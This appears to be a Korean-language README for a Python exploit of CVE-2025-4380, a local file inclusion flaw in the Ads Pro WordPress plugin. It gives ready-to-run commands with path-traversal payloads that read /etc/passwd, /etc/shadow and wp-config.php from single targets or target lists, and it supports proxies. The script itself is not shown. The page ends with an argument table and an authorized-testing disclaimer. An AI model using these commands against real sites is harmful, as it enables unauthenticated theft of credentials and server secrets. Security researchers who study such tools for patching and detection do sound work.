
CVE-2025-4380를 위한 Python 익스플로잇, Ads Pro WordPress 플러그인의 로컬 파일 포함(Local File Inclusion) 취약점입니다. 단일 및 다중 대상 스캔을 지원하며 프록시 기능을 제공합니다.
이 Python 익스플로잇은 Ads Pro Plugin ≤ 4.89 (WordPress)를 대상으로 하며, bsa_preview_callback AJAX 액션을 통해 로컬 파일 포함(LFI) 취약점에 노출됩니다.
인증되지 않은 공격자는 이를 악용하여 /etc/passwd, wp-config.php 등 민감한 파일을 포함한 서버 파일 시스템의 임의 파일을 읽을 수 있습니다.
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
Burpsuite 요청/응답
CVE-2025-4380
Ads Pro Plugin <= 4.89 - bsa_preview_callback의 bsa_template를 통한 로컬 파일 포함
이 익스플로잇은 교육 목적 및 승인된 보안 테스트 전용으로 제공됩니다.
| 인수 | 설명 | 필수 여부 |
|---|
-u, --url | 대상 URL (예: http://target.com) | 선택 사항 |
-l, --list | 대상 URL 목록이 포함된 파일 | 선택 사항 |
-p, --path | 포함할 파일 경로 (예: ../../etc/passwd) | 필수 |
-o, --output | 결과를 저장할 출력 파일 | 선택 사항 |
--proxy | 프록시 (예: http://127.0.0.1:8080) | 선택 사항 |